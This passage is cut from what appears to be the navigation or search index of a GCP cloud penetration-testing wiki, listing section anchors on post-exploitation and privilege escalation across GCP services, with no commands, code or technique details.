p-basic-information/index.html#users","pentesting-cloud/gcp-security/gcp-basic-information/index.html#groups","pentesting-cloud/gcp-security/gcp-basic-information/index.html#default-password-policy","pentesting-cloud/gcp-security/gcp-basic-information/index.html#service-accounts","pentesting-cloud/gcp-security/gcp-basic-information/index.html#keys--tokens","pentesting-cloud/gcp-security/gcp-basic-information/index.html#access-scopes","pentesting-cloud/gcp-security/gcp-basic-information/index.html#terraform-iam-policies-bindings-and-memberships","pentesting-cloud/gcp-security/gcp-basic-information/index.html#references","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp---federation-abuse","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#oidc---github-actions-abuse","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#github","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#gcp---permissions-for-a-pentest","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#individual-tools-permissions","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#purplepanda","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#scoutsuite","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cloudsploit","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cartography","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#starbase","pentesting-cloud/gcp-security/gcp-post-exploitation/index.html#gcp---post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#gcp---app-engine-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#app-engine","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#appenginememcacheaddkey--appenginememcachelist--appenginememcachegetkey--appenginememcacheflush","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#loggingviewsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#read-source-code","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#modify-source-code","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#gcp---artifact-registry-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#artifact-registry","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#privesc","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#gcp---cloud-build-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloudbuildbuildsapprove","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#gcp---cloud-functions-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloudfunctionsfunctionssourcecodeget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#steal-cloud-function-requests","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#gcp---cloud-run-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#cloud-run","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#access-the-images","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#modify--redeploy-the-image","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#gcp---cloud-shell-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#cloud-shell","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#container-escape","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#use-it-as-proxy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#gcp---cloud-sql-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloud-sql","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesupdate--cloudsqlinstancesget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlusersupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesrestorebackup-cloudsqlbackuprunsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlbackuprunsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesexport-storageobjectscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesimport-storageobjectsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqldatabasesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#gcp---compute-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#compute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#export--inspect-images-locally","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#export--inspect-snapshots--disks-locally","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspect-an-image-creating-a-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspect-a-snapshotdisk-attaching-it-to-a-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#gcp---filestore-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#mount-filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#remove-restrictions-and-get-extra-permissions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#restore-a-backup","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#create-a-backup-and-restore-it","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#gcp---iam-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#iam","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#granting-access-to-management-console","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#gcp---kms-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsdestroy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoencrypt--cloudkmscryptokeyversionsusetoencryptviadelegation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetosign","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoverify","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#gcp---logging-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#basic-information","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#default-logging","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#add-excepted-principal","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#read-logs---logginglogentrieslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#write-logs---logginglogentriescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#gcp---monitoring-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoring","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#gcp---pubsub-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsub","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicspublish","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdetachsubscription","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionscreate-pubsubtopicsattachsubscription--pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasattach-pubsubtopicsupdatepubsubschemascreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemassetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsnapshotscreate-pubsubsnapshotsseek","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#gcp---secretmanager-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanager","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#gcp---security-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#security","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsbulkmuteupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingssetmute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#gcp---vertex-ai-post-exploitation-via-hugging-face-model-namespace-reuse","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#scenario","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#identifying-reusable-namespaces-hf","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#end-to-end-attack-flow-against-vertex-ai","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#post-exploitation-tips-vertex-ai-endpoint","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#defensive-guidance-for-vertex-ai-users","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#recognition-heuristics-http","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#cross-references","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.html#references","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#gcp---workflows-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#workflow","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#gcp---storage-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#cloud-storage","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#give-public-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#gcp---privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#introduction-to-gcp-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#permissions-for-privilege-escalation-methodology","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#bypassing-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#privilege-escalation-techniques","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#abusing-gcp-to-escalate-privileges-locally","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#gcp---apikeys-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#brute-force-api-key-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysgetkeystring--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysundelete--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#create-internal-oauth-application-to-phish-other-workers","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#gcp---appengine-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsget-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineoperationslist-appengineservicesget-appengineserviceslist-appengineversionscreate-appengineversionsget-appengineversionslist-cloudbuildbuildsgetiamserviceaccountsactas-resourcemanagerprojectsget-storageobjectscreate-storageobjectslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#update-equivalent-permissions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineinstancesenabledebug-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineservicesget-appengineserviceslist-appengineversionsget-appengineversionslist-computeprojectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsupdate-appengineoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineversionsgetfilecontents-appengineversionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#write-access-over-the-buckets","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#write-access-over-the-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#gcp---artifact-registry-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifactregistryrepositoriesuploadartifacts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#gcp---batch-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batch","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batchjobscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#gcp---bigquery-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquery","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#read-table","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#export-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#insert-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetsupdate-bigquerydatasetsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerytablessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigqueryrowaccesspoliciesupdate-bigqueryrowaccesspoliciessetiampolicy-bigquerytablesgetdata-bigqueryjobscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#gcp---clientauthconfig-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#create-oauth-brand-and-client","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#gcp---cloudbuild-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuild","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadwritetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildconnectionsfetchlinkablerepositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#gcp---cloudfunctions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionscreate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssourcecodeset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssetiampolicy--iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#read--write-access-over-the-bucket","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#read--write-access-over-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#gcp---cloudidentity-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#cloudidentity","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#add-yourself-to-a-group","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#modify-group-membership","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#gcp---cloud-scheduler-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloud-scheduler","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobscreate--iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobsupdate--iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#gcp---cloud-tasks-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloud-tasks","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloudtaskstaskscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloudtaskstasksrun-cloudtaskstaskslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloudtasksqueuessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#gcp---compute-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#compute","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeprojectssetcommoninstancemetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetmetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesoslogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesosadminlogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancescreateiamserviceaccountsactas-computediskscreate-computeinstancescreate-computeinstancessetmetadata-computeinstancessetserviceaccount-computesubnetworksuse-computesubnetworksuseexternalip","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#osconfigpatchdeploymentscreate--osconfigpatchjobsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computemachineimagessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computesnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computediskssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#bypass-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#local-privilege-escalation-in-gcp-compute-instance","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---add-custom-ssh-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#modifying-the-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#incorporation-of-ssh-keys-into-custom-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#add-ssh-key-to-existing-privileged-user","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#create-a-new-privileged-user-and-add-a-ssh-key","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#ssh-keys-at-project-level","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#gcp---composer-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#download-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#write-access-to-the-composer-bucket","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-plugins","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#gcp---container-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#container","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerclustersget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesescalate--containerclusterrolesescalate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesbind--containerclusterrolesbind","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containercronjobscreate--containercronjobsupdate--containerdaemonsetscreate--containerdaemonsetsupdate--containerdeploymentscreate--containerdeploymentsupdate--containerjobscreate--containerjobsupdate--containerpodscreate--containerpodsupdate--containerreplicasetscreate--containerreplicasetsupdate--containerreplicationcontrollerscreate--containerreplicationcontrollersupdate--containerscheduledjobscreate--containerscheduledjobsupdate--containerstatefulsetscreate--containerstatefulsetsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containersecretsget--containersecretslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsportforward","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerserviceaccountscreatetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containermutatingwebhookconfigurationscreate--containermutatingwebhookconfigurationsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#gcp-dataproc-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataproc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataprocclustersget-dataprocclustersuse-dataprocjobscreate-dataprocjobsget-dataprocjobslist-storageobjectscreate-storageobjectsget","pentesting-cloud/gcp